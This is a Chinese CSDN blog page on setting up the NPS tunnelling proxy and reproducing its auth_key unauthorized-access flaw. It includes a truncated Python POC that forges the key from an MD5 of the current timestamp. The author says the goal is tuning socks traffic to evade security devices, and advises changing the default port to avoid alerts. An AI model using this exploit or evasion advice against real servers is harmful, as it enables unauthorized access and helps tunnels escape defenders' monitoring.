NPS之Socks流量分析以及未授权复现

最新推荐文章于 2024-09-20 23:30:00 发布
最新推荐文章于 2024-09-20 23:30:00 发布
阅读量547 收藏 1
点赞数
文章标签: ubuntu 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text2206/article/details/128919878
版权
本文介绍了NPS未授权复现的过程,包括环境设置、POC验证、修复措施,并详细探讨了socks流量分析,涉及版本校验、数据加密和安全设备告警规避。此外,提供了网络安全学习资源。
摘要由CSDN通过智能技术生成

前言

因为想要写一个socks的流量算法去绕过安全设备,所以这里对nps的流量特征总结一下,方便自己后期的魔改。

环境

ubuntu 16.04 vps server

windows server 2012R2 clinet

mkdir nps  
cd nps  
wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz  
tar -zxvf linux_amd64_server.tar.gz  
./nps install

image-20220804172812482.png

cd /etc/nps/conf/  
vim nps.conf

配置文件

#web  
web_host=a.o.com  
web_username=xxxx    //管理端用户名  
web_password=xxxxxx  //管理端密码  
web_port = xxxxx     //管理端端口  
web_ip=0.0.0.0  
web_base_url=  
web_open_ssl=false  
web_cert_file=conf/server.pem  
web_key_file=conf/server.key  
#web_base_url=/nps

image-20220804173007236.png

##bridge  
bridge_type=tcp   //客户端连接协议tcp  
bridge_port=xxxx  //客户端连接端口  
bridge_ip=0.0.0.0

image-20220804173738483.png

bridge_port的默认端口默认为8024,这里不建议改为默认的,连接客户端的时候可能会触发安全设备规则

NPS未授权复现

POC

#encoding=utf-8  
import time  
import hashlib  
now = time.time()  
m = hashlib.md5()  
m.update(str(int(now)).encode("utf8"))  
auth_key = m.hexdigest()  
​  
print("Index/Index?auth_key=%s&timestam
最低0.47元/天 解锁文章
AIGC_Allen
关注
nps auth_key授权访问漏洞
xiaokp7的博客
08-02 2667
nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。其中auth_key 存在授权访问漏洞,当 nps.conf 中的 auth_key 配置时攻击者通过生成特定的请求包可以获取服务器后台权限。
NPS反向代理流量分析
热爱学习,喜欢折腾!
08-31 3086
nps是一款轻量级、高性能、功能强大的内网穿透反向代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。............
nps 授权访问 利用exp脚本
08-18
nps 授权访问 利用exp脚本
NPS指南:简便稳定的内网穿透神器,开源免费!
最新发布
jast
09-20 1690
下载地址:https://github.com/ehang-io/nps/releases/download/v0.26.10/darwin_amd64_client.tar.gz。这是服务器和客户端进行通信时的身份验证信息,必须与服务器的配置匹配。取Web页面中显示的密钥。此时我们创建完可以看到连接状态为离线,接下来我们注册客户端就可以。nps默认配置文件使用了80,443,8080,8024端口。是 NPS 服务器的通信端口,通常在服务器端的配置中定义。NPS有多种模式可以用,下面是各模式的应用场景。
nps 授权访问检测脚本 ——poc
weixin_55885866的博客
08-18 345
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
nps:一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。a lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal
05-12
NPS | NPS是具有功能强大的Web管理终端的轻型,高性能,功能强大的Intranet渗透代理服务器。 特征 全面的协议支持,与几乎所有常用协议兼容,例如tcp,udp,http(s),socks5,p2p,http代理... 全面的平台兼容性...
授权访问漏洞合集
m0_49420271的博客
07-24 1258
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
nps内网穿透服务器搭建教程(阿里云)-小宇特详解
小宇的web博客
05-10 4452
nps内网穿透服务器搭建教程(阿里云)-小宇特详解 前期准备 1.一台云服务器 2.配置安全组 3.在自己的电脑上安装nps服务器的话自己买,我这里使用的是阿里云 讲一下配置安全组 打开阿里云的官网进行登录,打开控制台,然后点击云服务器ECS,点击实例。右边点击更多,打开网络和安全组,安全组配置 然后点击右侧的配置规则 这里的入方向是其他主机能够访问这台服务器的端口,出方向是这台服务器能够输出数据的端口 这里点击快速添加,我这里是将所有的端口都开放了。 这里要想nps搭建成功必须打开80 8024
搭建NPS进行内网穿透,实现外网访问家里的电脑
fjsupermouse的博客
06-06 1725
本教程使用NPS搭建一个内网穿透服务,实现家里的电脑可以被外网访问。NPS是一款轻量级、高性能、功能强大的内网穿透代理服务器,支持tcp、udp、http等几乎所有流量转发,支持WEB界面管理主机连接。
内网代理流量:Socks5协议原理分析和编程
god_Zeo的安全博客
10-29 3825
0x00 前情提要 日常渗透演练中,代理是必不可少的,我们用的一般也都是CS自带socks4和代理工具的socks5协议,我们此时还要考虑在这个过程中的流量免杀的问题,所以还是要对底层的协议详细的看一下,然后对流量中的特征分析和修改一下 0x01 简介和流程 以下摘自维基百科 SOCKS是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。SOCKS是”SOCKetS”的缩写[注 1]。 当防火墙后的客户端要访问外部的服务器时,就跟SOCKS代理服务器连接。这个代理服务器控制客户端访问外网的资
Linux主机自动注册NPS客户端(脚本化)
清瞳清的博客
12-11 776
NPS自动注册客户端的脚本,从此解放双手,不再需要频繁的点点点了
NPS连接通信特征分析
weixin_48419704的博客
08-15 337
你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客:撤销:Ctrl/Command + Z 重做:Ctrl/Command + Y 加粗:Ctrl/Command + B 斜体:Ctrl/Command + I 标题:Ctrl/Command + S
应急响应全栈
qq_29437513的博客
07-25 2647
应急响应全栈
详细教你用NPS搭建内网穿透服务
星哲最开心
12-11 3481
详细教你用NPS搭建内网穿透服务
内网渗透系列:内网隧道之nps
闵行小鱼塘
04-09 2812
本文研究支持多种代理的一个工具,nps
【工具使用】NPS内网穿透工具介绍
做自己喜欢的事,并将其发挥到极致!
10-30 3893
内网穿透(NAT穿透)是一种技术,它允许通过公网访问内网的设备和服务。在许多情况下,设备和服务可能位于一个局域网内,这些设备和服务只能在局域网中访问。如果想从外部网络访问这些设备和服务,需要一种方法来穿透网络的边界,让公网可以访问您的内网设备和服务。内网穿透技术可以实现这一点。通过在公网上搭建服务器,然后将内网设备和服务通过一个安全的隧道连接到这个服务器上,从而实现公网访问。NPS是一款轻量级、高性能、功能强大的内网穿透代理服务器,支持tcp、udp、http等几乎所有流量转发,支持WEB界面管理主机连接。
nps 授权访问 burp
09-13
"NPS授权访问Burp" 可能指的是在使用Burp Suite进行web应用程序测试时,NPS服务器没有授权Burp Suite进行相关的网络访问。 这种情况可能发生在两个场景中: 1. NPS服务器中允许Burp Suite的访问:NPS服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值